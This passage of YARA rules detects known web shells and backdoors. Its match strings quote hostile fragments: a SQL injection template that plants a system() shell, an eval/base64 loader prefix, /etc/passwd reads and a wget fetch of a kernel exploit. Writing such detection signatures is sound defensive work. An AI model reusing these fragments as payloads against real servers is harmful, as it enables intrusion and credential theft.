        $x2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword ascii
        $x3 = "print \"error; help: head -n 16 d00r.py\"" fullword ascii
        $x4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword ascii
    condition:
        any of them
}
rule webshell_php_up : webshell {
    // Two of three fragments are required. $x2 and $x3 are ordinary
    // $HTTP_POST_FILES upload idioms, so the pair without $x1 (the copy
    // to an attacker-chosen $_POST['remotefile']) may hit old but benign
    // upload scripts; review such hits.
    meta:
        description = "Web Shell - file up.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "7edefb8bd0876c41906f4b39b52cd0ef"
    strings:
        $x1 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword ascii
        $x2 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword ascii
        $x3 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword ascii
    condition:
        2 of ($x*)
}
rule cgi_python_py {
    // Any single fragment matches. Note that the indicators are an author
    // credit and form-parsing helper code rather than shell behaviour, so
    // benign copies of the same helper module will also match.
    meta:
        description = "Semi-Auto-generated  - file cgi-python.py.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "0a15f473e2232b89dae1075e1afdac97"
    strings:
        $x1 = "a CGI by Fuzzyman" ascii
        $x2 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + " ascii
        $x3 = "values = map(lambda x: x.value, theform[field])     # allows for" ascii
    condition:
        any of them
}
rule webshell_Expdoor_com_ASP {
    // Two of five fragments: Expdoor.com branding, a FileName input,
    // and FileSystemObject/OpenTextFile lines.
    meta:
        description = "Web shells - generated from file Expdoor.com ASP.asp"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "caef01bb8906d909f24d1fa109ea18a7"
    strings:
        $x1 = "\">www.Expdoor.com</a>" fullword ascii
        $x2 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max" ascii
        $x3 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword ascii
        $x4 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword ascii
        $x5 = "<TITLE>Expdoor.com ASP" fullword ascii
    condition:
        2 of ($x*)
}
rule WebShell_php_webshells_myshell {
    // Any single fragment matches: system() calls redirecting into
    // /tmp/output.txt, the MyShell title and a rand()-seeded marker line.
    meta:
        description = "PHP Webshells Github Archive - file myshell.php"
        author = "Florian Roth"
        hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
    strings:
        $x1 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu" ascii
        $x2 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o" ascii
        $x3 = "<title>$MyShellVersion - Access Denied</title>" fullword ascii
        $x4 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT" ascii
    condition:
        any of them
}
rule webshell_807_dm_JspSpyJDK5_m_cofigrue {
    // Super rule for five JSP shells; either fragment alone matches.
    meta:
        description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
        hash1 = "14e9688c86b454ed48171a9d4f48ace8"
        hash2 = "341298482cf90febebb8616426080d1d"
        hash3 = "88fc87e7c58249a398efd5ceae636073"
        hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
    strings:
        $x1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword ascii
        $x2 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword ascii
    condition:
        $x1 or $x2
}
rule WebShell_NCC_Shell {
    // Three of six fragments: an upload check on $_FILES['probe'],
    // author/team credits, a German upload page title and a size printf.
    meta:
        description = "PHP Webshells Github Archive - file NCC-Shell.php"
        author = "Florian Roth"
        hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
    strings:
        $x1 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword ascii
        $x2 = "<b>--Coded by Silver" fullword ascii
        $x3 = "<title>Upload - Shell/Datei</title>" fullword ascii
        $x4 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><" ascii
        $x5 = "~|_Team .:National Cracker Crew:._|~<br>" fullword ascii
        $x6 = "printf(\"Sie ist %u Bytes gro" fullword ascii
    condition:
        3 of ($x*)
}
rule webshell_ASP_zehir {
    // Single-indicator rule: a Response.Write line building a wingdings
    // status link from dosyaPath in the zehir shell.
    meta:
        description = "Web Shell - file zehir.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "0061d800aee63ccaf41d2d62ec15985d"
    strings:
        $x1 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&" ascii
    condition:
        $x1
}
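rule telnet_cgi {
    // $s0 is only the hostname of a public website, so on its own it is
    // not evidence of the shell and fires on any file that references that
    // site. The condition therefore lets the warning banner, the cookie
    // reset and the prompt-building line ($s1..$s3) match alone, while
    // $s0 only contributes as a companion to one of them.
    meta:
        description = "Semi-Auto-generated  - file telnet.cgi.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "dee697481383052980c20c48de1598d1"
    strings:
        $s0 = "www.rohitab.com"
        $s1 = "W A R N I N G: Private Server"
        $s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
        $s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
    condition:
        1 of ($s1, $s2, $s3) or 2 of them
}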
rule ZXshell2_0_rar_Folder_zxrecv {
    // All seven indicators are required; they are short fragments taken
    // from the binary's data rather than readable source.
    meta:
        description = "Webshells Auto-generated - file zxrecv.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
    strings:
        $x1 = "RyFlushBuff" ascii
        $x2 = "teToWideChar^FiYP" ascii
        $x3 = "mdesc+8F D" ascii
        $x4 = "\\von76std" ascii
        $x5 = "5pur+virtul" ascii
        $x6 = "- Kablto io" ascii
        $x7 = "ac#f{lowi8a" ascii
    condition:
        all of ($x*)
}
rule Webshell_27_9_c66_c99 {
    // Any one c99-family fragment (c99sh_surl cookie handling, the
    // c99shcook extract, or the c99_buff_prepare guard) within the size cap.
    meta:
        description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."
        author = "Florian Roth"
        reference = "https://github.com/nikicat/web-malware-collection"
        date = "2016-01-11"
        score = 70
        hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
        hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
        hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
        hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"
        hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"
        hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
        hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
        hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
        hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
        hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
    strings:
        $x1 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
        $x2 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
        $x3 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
    condition:
        any of them and filesize < 685KB
}
rule webshell_NetworkFileManagerPHP {
    // Single-indicator rule on a table-dump status message.
    meta:
        description = "Web Shell - file NetworkFileManagerPHP.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
    strings:
        $x1 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted " ascii
    condition:
        $x1
}
rule php_killnc : webshell {
    // Four of five Laudanum killnc.php fragments within a small size cap:
    // the allow-list IP check, a fake 404 header, the exec() line, the
    // page title and the allowedIPs loop.
    meta:
        description = "Laudanum Injector Tools - file killnc.php"
        author = "Florian Roth"
        reference = "http://laudanum.inguardians.com/"
        date = "2015-06-22"
        hash = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
    strings:
        $x1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii /* PEStudio Blacklist: strings */
        $x2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii
        $x3 = "<?php echo exec('killall nc');?>" fullword ascii /* PEStudio Blacklist: strings */
        $x4 = "<title>Laudanum Kill nc</title>" fullword ascii /* PEStudio Blacklist: strings */
        $x5 = "foreach ($allowedIPs as $IP) {" fullword ascii
    condition:
        4 of ($x*) and filesize < 15KB
}
rule WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz {
    // Three of four fragments: a Copyright meta tag and three source
    // comments / branches around the 'ls' command handling.
    meta:
        description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
        author = "Florian Roth"
        hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
    strings:
        $x1 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword ascii
        $x2 = "directory... Trust me - it works :-) */" fullword ascii
        $x3 = "/* ls looks much better with ' -F', IMHO. */" fullword ascii
        $x4 = "} else if ($command == 'ls') {" fullword ascii
    condition:
        3 of ($x*)
}
rule hkshell_hkshell {
    // All three binary fragments are required; the first two look like
    // mangled API / registry names and carry most of the specificity.
    meta:
        description = "Webshells Auto-generated - file hkshell.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "168cab58cee59dc4706b3be988312580"
    strings:
        $x1 = "PrSessKERNELU" ascii
        $x2 = "Cur3ntV7sion" ascii
        $x3 = "Explorer8" ascii
    condition:
        $x1 and $x2 and $x3
}
rule webshell_jsp_hsxa {
    // Single-indicator rule. The string is only a JSP page directive with
    // a gbk encoding followed by an XML-style import directive; nothing in
    // it is shell-specific, so expect matches on benign GBK-encoded JSP
    // pages and confirm hits by inspecting the file.
    meta:
        description = "Web Shell - file hsxa.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
    strings:
        $x1 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja" ascii
    condition:
        $x1
}
rule WebShell_DTool_Pro {
    // Three of eight fragments: Portuguese JavaScript prompts, the
    // r3v3ng4ns credit, source comments and a wget presence check.
    meta:
        description = "PHP Webshells Github Archive - file DTool Pro.php"
        author = "Florian Roth"
        hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
    strings:
        $x1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront" ascii
        $x2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword ascii
        $x3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig" ascii
        $x4 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword ascii
        $x5 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword ascii
        $x6 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword ascii
        $x7 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite " ascii
        $x8 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword ascii
    condition:
        3 of ($x*)
}
rule FSO_s_casus15 {
    // Single-indicator rule on a recursive-delete loop guard
    // ($deldir/$file with "." and ".." excluded).
    meta:
        description = "Webshells Auto-generated - file casus15.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "8d155b4239d922367af5d0a1b89533a3"
    strings:
        $x1 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))" ascii
    condition:
        $x1
}
rule WebShell_indexer_asp_php {
    // Three of six fragments: a Turkish language meta tag, the
    // SaNaLTeRoR title/message strings and two form actions.
    meta:
        description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
        author = "Florian Roth"
        hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
    strings:
        $x1 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword ascii
        $x2 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword ascii
        $x3 = "<form action=\"?Gonder\" method=\"post\">" fullword ascii
        $x4 = "<form action=\"?oku\" method=\"post\">" fullword ascii
        $x5 = "var message=\"SaNaLTeRoR - " fullword ascii
        $x6 = "nDexEr - Reader\"" fullword ascii
    condition:
        3 of ($x*)
}
rule iMHaPFtp {
    // Single-indicator rule on the permission-column header echo of the
    // iMHaPFtp file manager.
    meta:
        description = "Webshells Auto-generated - file iMHaPFtp.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "12911b73bc6a5d313b494102abcf5c57"
    strings:
        $x1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">" ascii
    condition:
        $x1
}
rule webshell_php_h6ss {
    // Single-indicator rule: a PHP open tag immediately followed by
    // eval(gzuncompress(base64_decode(" — a packed-payload loader prefix.
    meta:
        description = "Web Shell - file h6ss.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "272dde9a4a7265d6c139287560328cd5"
    strings:
        $x1 = "<?php eval(gzuncompress(base64_decode(\"" ascii
    condition:
        $x1
}
rule webshell_PHP_co {
    // Both encoded-blob fragments are required.
    meta:
        description = "Web Shell - file co.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "62199f5ac721a0cb9b28f465a513874c"
    strings:
        $x1 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword ascii
        $x2 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword ascii
    condition:
        $x1 and $x2
}
rule hxdef100_2 {
    // All three required: the hxdef mailslot name, an AV component path
    // fragment and the SafeBoot control key.
    meta:
        description = "Webshells Auto-generated - file hxdef100.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
    strings:
        $x1 = "\\\\.\\mailslot\\hxdef-rkc000" ascii
        $x2 = "Shared Components\\On Access Scanner\\BehaviourBlo" ascii
        $x3 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" ascii
    condition:
        $x1 and $x2 and $x3
}
rule WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah {
    // Super rule for three Ajax command-shell variants; three of seven
    // fragments (preset command menu entries, file-save handling and
    // the JavaScript form reset) must be present.
    meta:
        description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
        hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
        hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
    strings:
        $x1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword ascii
        $x2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword ascii
        $x3 = "$dt = $_POST['filecontent'];" fullword ascii
        $x4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword ascii
        $x5 = "print \"Sorry, none of the command functions works.\";" fullword ascii
        $x6 = "document.cmdform.command.value='';" fullword ascii
        $x7 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST" ascii
    condition:
        3 of ($x*)
}
rule WebShell_toolaspshell {
    // Two of three VBScript fragments (RHTOOLS banner, path slicing,
    // an index.asp destination) must be present.
    meta:
        description = "PHP Webshells Github Archive - file toolaspshell.php"
        author = "Florian Roth"
        hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
    strings:
        $x1 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef" ascii
        $x2 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword ascii
        $x3 = "destino3 = folderItem.path & \"\\index.asp\"" fullword ascii
    condition:
        2 of ($x*)
}
rule webshell_spjspshell {
    // Single-indicator rule on the usage hint text of spjspshell.
    meta:
        description = "Web Shell - file spjspshell.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "d39d51154aaad4ba89947c459a729971"
    strings:
        $x1 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:" ascii
    condition:
        $x1
}
rule Webshell_c100 {
    // Two of five c100 menu / helper fragments within the size cap.
    meta:
        description = "Detects Webshell - rule generated from from files c100 v. 777shell"
        author = "Florian Roth"
        reference = "https://github.com/nikicat/web-malware-collection"
        date = "2016-01-11"
        score = 70
        hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
        hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
        hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
        hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
        hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
        hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
        hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
    strings:
        $x1 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
        $x2 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
        $x3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
        $x4 = "which wget curl w3m lynx" ascii
        $x5 = "netstat -atup | grep IST" ascii
    condition:
        2 of ($x*) and filesize < 685KB
}
rule backdoorfr_php {
    // Either French-language fragment (usage example, mail-origin form
    // field) matches on its own.
    meta:
        description = "Semi-Auto-generated  - file backdoorfr.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "91e4afc7444ed258640e85bcaf0fecfc"
    strings:
        $x1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan" ascii
        $x2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc" ascii
    condition:
        $x1 or $x2
}
rule multiple_webshells_0025 {
    // Super rule with a single c99-family fragment (the $delerr report line).
    meta:
        description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_c99shell_v1_0_php_php_c99php_SsEs_php_php"
        hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
        hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
        hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
    strings:
        $x1 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword ascii
    condition:
        $x1
}
rule mysql_php_php {
    // Any single fragment matches: a mysqlread action link, a passthru()
    // branch and the rand()-seeded marker line shared with other shells.
    meta:
        description = "Semi-Auto-generated  - file mysql.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "12bbdf6ef403720442a47a3cc730d034"
    strings:
        $x1 = "action=mysqlread&mass=loadmass\">load all defaults" ascii
        $x2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru" ascii
        $x3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = " ascii
    condition:
        any of them
}
rule xssshell {
    // Single-indicator rule on the COMMANDS_URL polling request of xssshell.
    meta:
        description = "Webshells Auto-generated - file xssshell.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
    strings:
        $x1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma" ascii
    condition:
        $x1
}
rule WebShell_php_webshells_pHpINJ {
    // Any single pHpINJ fragment matches (exploit-link echo, form markup,
    // the UNION SELECT template, help text, header and submit button).
    meta:
        description = "PHP Webshells Github Archive - file pHpINJ.php"
        author = "Florian Roth"
        hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
    strings:
        $x1 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword ascii
        $x2 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword ascii
        $x3 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN" ascii
        $x4 = "Full server path to a writable file which will contain the Php Shell <br />" fullword ascii
        $x5 = "$expurl= $url.\"?id=\".$sql ;" fullword ascii
        $x6 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword ascii
        $x7 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword ascii
    condition:
        any of them
}
rule multiple_webshells_0020 {
    // Super rule for five c99-family shells; two of three fragments
    // (an ini_set highlight call, a PHP-code result banner, an
    // Owner/Group table column) must be present.
    meta:
        description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php"
        hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
        hash1 = "3ca5886cd54d495dc95793579611f59a"
        hash2 = "9c5bb5e3a46ec28039e8986324e42792"
        hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
        hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
    strings:
        $x1 = "@ini_set(\"highlight" fullword ascii
        $x2 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword ascii
        $x3 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword ascii
    condition:
        2 of ($x*)
}
rule WebShell_aZRaiLPhp_v1_0 {
    // Two of four fragments: Turkish UI text, a base_convert() of a
    // POSTed permission value, a touch() line and a directory link echo.
    meta:
        description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
        author = "Florian Roth"
        hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
    strings:
        $x1 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED" ascii
        $x2 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword ascii
        $x3 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword ascii
        $x4 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword ascii
    condition:
        2 of ($x*)
}
rule WebShell_ZyklonShell {
    // All four required. $x2..$x4 are generic "404 Not Found" page markup;
    // the specificity comes from $x1, the hard-coded zyklonshell.txt path.
    meta:
        description = "PHP Webshells Github Archive - file ZyklonShell.php"
        author = "Florian Roth"
        hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
    strings:
        $x1 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword ascii
        $x2 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword ascii
        $x3 = "<TITLE>404 Not Found</TITLE>" fullword ascii
        $x4 = "<H1>Not Found</H1>" fullword ascii
    condition:
        all of ($x*)
}
rule aspydrv_asp {
    // Two of three required. $x2 is the bare word "password" and $x1 looks
    // like a line from a reusable ASP form-parsing class, so the pair
    // $x1+$x2 without the session marker $x3 deserves manual confirmation.
    meta:
        description = "Semi-Auto-generated  - file aspydrv.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "1c01f8a88baee39aa1cebec644bbcb99"
        score = 60
    strings:
        $x1 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))" ascii
        $x2 = "password" ascii
        $x3 = "session(\"shagman\")=" ascii
    condition:
        2 of ($x*)
}
rule webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 {
    // Super rule for seven JSP shells; two of three fragments (a 1024-byte
    // read loop, a password session attribute, a GB2312 process reader)
    // must be present.
    meta:
        description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "64a3bf9142b045b9062b204db39d4d57"
        hash1 = "9abd397c6498c41967b4dd327cf8b55a"
        hash2 = "56c005690da2558690c4aa305a31ad37"
        hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
        hash4 = "532b93e02cddfbb548ce5938fe2f5559"
        hash5 = "6e0fa491d620d4af4b67bae9162844ae"
        hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
    strings:
        $x1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword ascii
        $x2 = "password = (String)session.getAttribute(\"password\");" fullword ascii
        $x3 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231" ascii
    condition:
        2 of ($x*)
}
rule EFSO_2_asp {
    // Both required: the "Ejder was HERE" tag and a fragment of the
    // script-encoded body.
    meta:
        description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "b5fde9682fd63415ae211d53c6bfaa4d"
    strings:
        $x1 = "Ejder was HERE" ascii
        $x2 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~" ascii
    condition:
        $x1 and $x2
}
rule webshell_B374kPHP_B374k {
    // Any single fragment matches: project URL, the str_rot13 decoder
    // prologue, and two credit strings.
    meta:
        description = "Web Shell - file B374k.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "bed7388976f8f1d90422e8795dff1ea6"
    strings:
        $x1 = "Http://code.google.com/p/b374k-shell" fullword ascii
        $x2 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'" ascii
        $x3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword ascii
        $x4 = "B374k Vip In Beautify Just For Self" fullword ascii
    condition:
        any of them
}
rule Dx_php_php {
    // Any single fragment matches: a file-view tip, the $DEF_PORTS table
    // and the rand()-seeded marker line shared with other shells.
    meta:
        description = "Semi-Auto-generated  - file Dx.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
    strings:
        $x1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx" ascii
        $x2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util" ascii
        $x3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP" ascii
    condition:
        any of them
}
rule webshell_jsp_hsxa1 {
    // Single-indicator rule on the same generic gbk JSP page directive used
    // by webshell_jsp_hsxa; nothing in the string is shell-specific, so
    // expect matches on benign GBK-encoded JSP pages and confirm manually.
    meta:
        description = "Web Shell - file hsxa1.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "5686d5a38c6f5b8c55095af95c2b0244"
    strings:
        $x1 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja" ascii
    condition:
        $x1
}
rule webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn {
    // Super rule for eight JSP file-manager shells. All four fragments are
    // plain HTML table markup with no shell-specific content, so even with
    // "all of" required, hits on ordinary directory-listing pages are
    // plausible; verify before acting on a match.
    meta:
        description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "7066f4469c3ec20f4890535b5f299122"
        hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
        hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
        hash3 = "8979594423b68489024447474d113894"
        hash4 = "ec482fc969d182e5440521c913bab9bd"
        hash5 = "f98d2b33cd777e160d1489afed96de39"
